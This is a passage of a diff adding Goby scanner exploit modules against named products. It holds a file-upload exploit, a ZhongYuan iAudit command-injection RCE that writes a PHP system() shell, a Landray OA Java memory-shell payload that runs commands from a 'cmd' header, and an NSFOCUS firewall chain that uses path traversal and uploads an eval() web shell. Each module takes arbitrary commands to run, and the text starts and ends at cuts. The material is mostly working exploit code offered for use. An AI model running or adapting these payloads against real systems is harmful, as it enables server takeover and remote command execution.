47	+	"type": "group",
48	+	"operation": "AND",
49	+	"checks": [
50	+	{
51	+	"type": "item",
52	+	"variable": "$code",
53	+	"operation": "==",
54	+	"value": "200",
55	+	"bz": ""
56	+	}
57	+	]
58	+	},
59	+	"SetVariable": [
60	+	"output\|lastbody\|regex\|"
61	+	]
62	+	},
63	+	{
64	+	"Request": {
65	+	"method": "GET",
66	+	"uri": "/Upload/test/{{{r1}}}.php",
67	+	"follow_redirect": false,
68	+	"header": null,
69	+	"data_type": "text",
70	+	"data": "",
71	+	"set_variable": []
72	+	},
73	+	"ResponseTest": {
74	+	"type": "group",
75	+	"operation": "AND",
76	+	"checks": [
77	+	{
78	+	"type": "item",
79	+	"variable": "$code",
80	+	"operation": "==",
81	+	"value": "200",
82	+	"bz": ""
83	+	},
84	+	{
85	+	"type": "item",
86	+	"variable": "$body",
87	+	"operation": "contains",
88	+	"value": "{{{str1}}}",
89	+	"bz": ""
90	+	}
91	+	]
92	+	},
93	+	"SetVariable": [
94	+	"output\|lastbody\|regex\|"
95	+	]
96	+	}
97	+	],
98	+	"ExploitSteps": [
99	+	"AND",
100	+	{
101	+	"Request": {
102	+	"method": "POST",
103	+	"uri": "/Upload/upload_file.php?l=test",
104	+	"follow_redirect": false,
105	+	"header": {
106	+	"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
107	+	},
108	+	"data_type": "text",
109	+	"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--",
110	+	"set_variable": [
111	+	"r1\|rand\|int\|8"
112	+	]
113	+	},
114	+	"ResponseTest": {
115	+	"type": "group",
116	+	"operation": "AND",
117	+	"checks": [
118	+	{
119	+	"type": "item",
120	+	"variable": "$code",
121	+	"operation": "==",
122	+	"value": "200",
123	+	"bz": ""
124	+	}
125	+	]
126	+	},
127	+	"SetVariable": [
128	+	"output\|lastbody\|regex\|"
129	+	]
130	+	},
131	+	{
132	+	"Request": {
133	+	"method": "GET",
134	+	"uri": "/Upload/test/{{{r1}}}.php",
135	+	"follow_redirect": false,
136	+	"header": null,
137	+	"data_type": "text",
138	+	"data": "",
139	+	"set_variable": []
140	+	},
141	+	"ResponseTest": {
142	+	"type": "group",
143	+	"operation": "AND",
144	+	"checks": [
145	+	{
146	+	"type": "item",
147	+	"variable": "$code",
148	+	"operation": "==",
149	+	"value": "200",
150	+	"bz": ""
151	+	}
152	+	]
153	+	},
154	+	"SetVariable": [
155	+	"output\|define\|text\|/Upload/test/{{{r1}}}.php"
156	+	]
157	+	}
158	+	],
159	+	"PostTime": "2021-12-09 13:55:04",
160	+	"GobyVersion": "1.9.310"
161	+	}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt

1	+	package exploits
2	+
3	+	import (
4	+	"fmt"
5	+	"git.gobies.org/goby/goscanner/goutils"
6	+	"git.gobies.org/goby/goscanner/jsonvul"
7	+	"git.gobies.org/goby/goscanner/scanconfig"
8	+	"git.gobies.org/goby/httpclient"
9	+	"strings"
10	+	)
11	+
12	+	func init() {
13	+	expJson := `{
14	+	"Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE",
15	+	"Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability",
16	+	"Product": "ZhongYuan iAudit",
17	+	"Homepage": "https://www.tosec.com.cn/",
18	+	"DisclosureDate": "2021-06-01",
19	+	"Author": "PeiQi",
20	+	"GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"",
21	+	"Level": "3",
22	+	"Impact": "<p>The existence of command splicing leads to remote command execution vulnerability<br></p>",
23	+	"Recommendation": "",
24	+	"References": [
25	+	"http://wiki.peiqi.tech"
26	+	],
27	+	"HasExp": true,
28	+	"ExpParams": [
29	+	{
30	+	"name": "Cmd",
31	+	"type": "input",
32	+	"value": "id"
33	+	}
34	+	],
35	+	"ScanSteps": [
36	+	"AND"
37	+	],
38	+	"ExploitSteps": null,
39	+	"Tags": [
40	+	"RCE"
41	+	],
42	+	"CVEIDs": null,
43	+	"CVSSScore": "0.0",
44	+	"AttackSurfaces": {
45	+	"Application": [
46	+	"WangKang Next generation firewall"
47	+	],
48	+	"Support": null,
49	+	"Service": null,
50	+	"System": null,
51	+	"Hardware": null
52	+	},
53	+	"Recommandation": "<p>Upgrade version<br></p>"
54	+	}`
55	+
56	+	ExpManager.AddExploit(NewExploit(
57	+	goutils.GetFileName(),
58	+	expJson,
59	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
60	+	randomStr := goutils.RandomHexString(8) + ".php"
61	+	uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
62	+	cfg_1 := httpclient.NewGetRequestConfig(uri_1)
63	+	cfg_1.VerifyTls = false
64	+	cfg_1.FollowRedirect = false
65	+	cfg_1.Header.Store("Content-type", "application/json")
66	+	if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
67	+	if resp.StatusCode == 200 {
68	+	uri_2 := "/" + randomStr
69	+	cfg_2 := httpclient.NewGetRequestConfig(uri_2)
70	+	cfg_2.VerifyTls = false
71	+	cfg_2.FollowRedirect = false
72	+	cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
73	+	if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
74	+	return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid")
75	+	}
76	+	}
77	+	}
78	+	return false
79	+	},
80	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
81	+	randomStr := goutils.RandomHexString(8) + ".php"
82	+	cmd := ss.Params["Cmd"].(string)
83	+	uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
84	+	cfg_1 := httpclient.NewGetRequestConfig(uri_1)
85	+	cfg_1.VerifyTls = false
86	+	cfg_1.FollowRedirect = false
87	+	cfg_1.Header.Store("Content-type", "application/json")
88	+	if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
89	+	if resp.StatusCode == 200 {
90	+	uri_2 := "/" + randomStr
91	+	cfg_2 := httpclient.NewGetRequestConfig(uri_2)
92	+	cfg_2.VerifyTls = false
93	+	cfg_2.FollowRedirect = false
94	+	cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
95	+	if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
96	+	expResult.Output = resp.Utf8Html
97	+	expResult.Success = true
98	+	}
99	+	}
100	+	}
101	+	return expResult
102	+	},
103	+	))
104	+	}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/landray_oa_treexml_rce.txt

1	+	package exploits
2	+
3	+	import (
4	+	"git.gobies.org/goby/goscanner/goutils"
5	+	)
6	+
7	+	func init() {
8	+	expJson := `{
9	+	"Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
10	+	"Description": "<p><span style=\"color: rgba(0, 0, 0, 0.8); font-size: 16px;\">蓝凌OA treexml.tmpl存在远程代码执行漏洞，攻击者通过发送特定的请求包可以获取服务器权限</span><br></p>",
11	+	"Product": "蓝凌OA",
12	+	"Homepage": "www.landray.com.cn",
13	+	"DisclosureDate": "2022-07-18",
14	+	"Author": "",
15	+	"FofaQuery": "app=\"Landray-OA系统\"",
16	+	"GobyQuery": "app=\"Landray-OA系统\"",
17	+	"Level": "3",
18	+	"Impact": "",
19	+	"Recommendation": "",
20	+	"References": [
21	+	"http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html"
22	+	],
23	+	"Is0day": false,
24	+	"HasExp": true,
25	+	"ExpParams": [
26	+	{
27	+	"name": "command",
28	+	"type": "input",
29	+	"value": "whoami",
30	+	"show": ""
31	+	}
32	+	],
33	+	"ExpTips": {
34	+	"Type": "",
35	+	"Content": ""
36	+	},
37	+	"ScanSteps": [
38	+	"AND",
39	+	{
40	+	"Request": {
41	+	"method": "POST",
42	+	"uri": "/data/sys-common/treexml.tmpl",
43	+	"follow_redirect": true,
44	+	"header": {
45	+	"User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
46	+	"Accept-Encoding": "gzip, deflate",
47	+	"cmd": "echo This page has a bug",
48	+	"Accept": "/",
49	+	"Content-Type": "application/x-www-form-urlencoded"
50	+	},
51	+	"data_type": "text",
52	+	"data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+\|\|+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
53	+	},
54	+	"ResponseTest": {
55	+	"type": "group",
56	+	"operation": "AND",
57	+	"checks": [
58	+	{
59	+	"type": "item",
60	+	"variable": "$code",
61	+	"operation": "==",
62	+	"value": "200",
63	+	"bz": ""
64	+	},
65	+	{
66	+	"type": "item",
67	+	"variable": "$body",
68	+	"operation": "contains",
69	+	"value": "This page has a bug",
70	+	"bz": ""
71	+	}
72	+	]
73	+	},
74	+	"SetVariable": []
75	+	}
76	+	],
77	+	"ExploitSteps": [
78	+	"AND",
79	+	{
80	+	"Request": {
81	+	"method": "POST",
82	+	"uri": "/data/sys-common/treexml.tmpl",
83	+	"follow_redirect": true,
84	+	"header": {
85	+	"User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
86	+	"Accept-Encoding": "gzip, deflate",
87	+	"cmd": "{{{command}}}",
88	+	"Accept": "/",
89	+	"Content-Type": "application/x-www-form-urlencoded"
90	+	},
91	+	"data_type": "text",
92	+	"data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+\|\|+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
93	+	},
94	+	"ResponseTest": {
95	+	"type": "group",
96	+	"operation": "AND",
97	+	"checks": [
98	+	{
99	+	"type": "item",
100	+	"variable": "$code",
101	+	"operation": "==",
102	+	"value": "200",
103	+	"bz": ""
104	+	}
105	+	]
106	+	},
107	+	"SetVariable": [
108	+	"output\|lastbody\|\|"
109	+	]
110	+	}
111	+	],
112	+	"Tags": [
113	+	"代码执⾏"
114	+	],
115	+	"VulType": [
116	+	"代码执⾏"
117	+	],
118	+	"CVEIDs": [
119	+	""
120	+	],
121	+	"CNNVD": [
122	+	""
123	+	],
124	+	"CNVD": [
125	+	""
126	+	],
127	+	"CVSSScore": "",
128	+	"Translation": {
129	+	"CN": {
130	+	"Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
131	+	"Product": "蓝凌OA",
132	+	"Description": "<p><span style=\"color: rgba(0, 0, 0, 0.8); font-size: 16px;\">蓝凌OA treexml.tmpl存在远程代码执行漏洞，攻击者通过发送特定的请求包可以获取服务器权限</span><br></p>",
133	+	"Recommendation": "",
134	+	"Impact": "",
135	+	"VulType": [
136	+	"代码执⾏"
137	+	],
138	+	"Tags": [
139	+	"代码执⾏"
140	+	]
141	+	},
142	+	"EN": {
143	+	"Name": "landray-oa-treexml-rce",
144	+	"Product": "",
145	+	"Description": "",
146	+	"Recommendation": "",
147	+	"Impact": "",
148	+	"VulType": [],
149	+	"Tags": []
150	+	}
151	+	},
152	+	"AttackSurfaces": {
153	+	"Application": null,
154	+	"Support": null,
155	+	"Service": null,
156	+	"System": null,
157	+	"Hardware": null
158	+	}
159	+	}`
160	+
161	+	ExpManager.AddExploit(NewExploit(
162	+	goutils.GetFileName(),
163	+	expJson,
164	+	nil,
165	+	nil,
166	+	))
167	+	}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/nsfocus_resourse.php_arbitrary_file_upload_vulnerability.txt

1	+	package exploits
2	+
3	+	import (
4	+	"fmt"
5	+	"git.gobies.org/goby/goscanner/goutils"
6	+	"git.gobies.org/goby/goscanner/jsonvul"
7	+	"git.gobies.org/goby/goscanner/scanconfig"
8	+	"git.gobies.org/goby/httpclient"
9	+	"net/url"
10	+	"strings"
11	+	"time"
12	+	)
13	+
14	+	func init() {
15	+	expJson := `{
16	+	"Name": "nsfocus resourse.php arbitrary file upload vulnerability",
17	+	"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
18	+	"Product": "nsfocus",
19	+	"Homepage": "https://www.nsfocus.com.cn/",
20	+	"DisclosureDate": "2022-07-18",
21	+	"Author": "LittleBlack",
22	+	"FofaQuery": "banner=\"PHPSESSID_NF\" \|\| header=\"PHPSESSID_NF\"",
23	+	"GobyQuery": "banner=\"PHPSESSID_NF\" \|\| header=\"PHPSESSID_NF\"",
24	+	"Level": "3",
25	+	"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
26	+	"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
27	+	"References": [
28	+	"https://fofa.so/"
29	+	],
30	+	"Is0day": false,
31	+	"HasExp": true,
32	+	"ExpParams": [
33	+	{
34	+	"name": "cmd",
35	+	"type": "input",
36	+	"value": "system('id');",
37	+	"show": ""
38	+	}
39	+	],
40	+	"ExpTips": {
41	+	"Type": "",
42	+	"Content": ""
43	+	},
44	+	"ScanSteps": [
45	+	"AND",
46	+	{
47	+	"Request": {
48	+	"method": "GET",
49	+	"uri": "/test.php",
50	+	"follow_redirect": true,
51	+	"header": {},
52	+	"data_type": "text",
53	+	"data": ""
54	+	},
55	+	"ResponseTest": {
56	+	"type": "group",
57	+	"operation": "AND",
58	+	"checks": [
59	+	{
60	+	"type": "item",
61	+	"variable": "$code",
62	+	"operation": "==",
63	+	"value": "200",
64	+	"bz": ""
65	+	},
66	+	{
67	+	"type": "item",
68	+	"variable": "$body",
69	+	"operation": "contains",
70	+	"value": "test",
71	+	"bz": ""
72	+	}
73	+	]
74	+	},
75	+	"SetVariable": []
76	+	}
77	+	],
78	+	"ExploitSteps": [
79	+	"AND",
80	+	{
81	+	"Request": {
82	+	"method": "GET",
83	+	"uri": "/test.php",
84	+	"follow_redirect": true,
85	+	"header": {},
86	+	"data_type": "text",
87	+	"data": ""
88	+	},
89	+	"ResponseTest": {
90	+	"type": "group",
91	+	"operation": "AND",
92	+	"checks": [
93	+	{
94	+	"type": "item",
95	+	"variable": "$code",
96	+	"operation": "==",
97	+	"value": "200",
98	+	"bz": ""
99	+	},
100	+	{
101	+	"type": "item",
102	+	"variable": "$body",
103	+	"operation": "contains",
104	+	"value": "test",
105	+	"bz": ""
106	+	}
107	+	]
108	+	},
109	+	"SetVariable": []
110	+	}
111	+	],
112	+	"VulType": [
113	+	"Code Execution"
114	+	],
115	+	"Tags": [
116	+	"Code Execution"
117	+	],
118	+	"CVEIDs": [
119	+	""
120	+	],
121	+	"CNNVD": [
122	+	""
123	+	],
124	+	"CNVD": [
125	+	""
126	+	],
127	+	"CVSSScore": "9.5",
128	+	"Translation": {
129	+	"CN": {
130	+	"Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
131	+	"Product": "绿盟下一代防火墙",
132	+	"Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞，攻击者可上传恶意木马，获取服务器权限。<br></p>",
133	+	"Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新：<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
134	+	"Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞，攻击者可上传恶意木马，获取服务器权限。<br></p>",
135	+	"VulType": [
136	+	"代码执⾏"
137	+	],
138	+	"Tags": [
139	+	"代码执⾏"
140	+	]
141	+	},
142	+	"EN": {
143	+	"Name": "nsfocus resourse.php 任意文件上传漏洞",
144	+	"Product": "nsfocus",
145	+	"Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
146	+	"Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>",
147	+	"Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
148	+	"VulType": [
149	+	"Code Execution"
150	+	],
151	+	"Tags": [
152	+	"Code Execution"
153	+	]
154	+	}
155	+	},
156	+	"AttackSurfaces": {
157	+	"Application": null,
158	+	"Support": null,
159	+	"Service": null,
160	+	"System": null,
161	+	"Hardware": null
162	+	}
163	+	}`
164	+
165	+	ExpManager.AddExploit(NewExploit(
166	+	goutils.GetFileName(),
167	+	expJson,
168	+	func(exp jsonvul.JsonVul, u httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
169	+
170	+	u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
171	+	uri1 := "/api/v1/device/bugsInfo"
172	+	cfg1 := httpclient.NewPostRequestConfig(uri1)
173	+	cfg1.VerifyTls = false
174	+	cfg1.FollowRedirect = false
175	+	cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
176	+	cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang\|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
177	+	if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
178	+	time.Sleep(time.Second * 5)
179	+	uri2 := "/api/v1/device/bugsInfo"
180	+	cfg2 := httpclient.NewPostRequestConfig(uri2)
181	+	cfg2.VerifyTls = false
182	+	cfg2.FollowRedirect = false
183	+	cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
184	+	cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
185	+	if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
186	+	u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
187	+	uri3 := "/mail/include/header_main.php"
188	+	cfg3 := httpclient.NewPostRequestConfig(uri3)
189	+	cfg3.VerifyTls = false
190	+	cfg3.FollowRedirect = false
191	+	cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
192	+	cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
193	+	cfg3.Data = "1=print+md5%281%29%3B"
194	+	if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
195	+	return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
196	+	}
197	+
198	+	}
199	+	}
200	+
201	+	return false
202	+	},
203	+	func(expResult jsonvul.ExploitResult, ss scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
204	+	cmd := ss.Params["cmd"].(string)
205	+
206	+	u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
207	+	uri1 := "/api/v1/device/bugsInfo"
208	+	cfg1 := httpclient.NewPostRequestConfig(uri1)
209	+	cfg1.VerifyTls = false
210	+	cfg1.FollowRedirect = false
211	+	cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
212	+	cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang\|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
213	+	if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
214	+	time.Sleep(time.Second * 5)
215	+	uri2 := "/api/v1/device/bugsInfo"
216	+	cfg2 := httpclient.NewPostRequestConfig(uri2)
217	+	cfg2.VerifyTls = false
218	+	cfg2.FollowRedirect = false
219	+	cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
220	+	cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
221	+	if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
222	+	u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
223	+	uri3 := "/mail/include/header_main.php"
224	+	cfg3 := httpclient.NewPostRequestConfig(uri3)
225	+	cfg3.VerifyTls = false
226	+	cfg3.FollowRedirect = false
227	+	cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
228	+	cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
229	+	cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
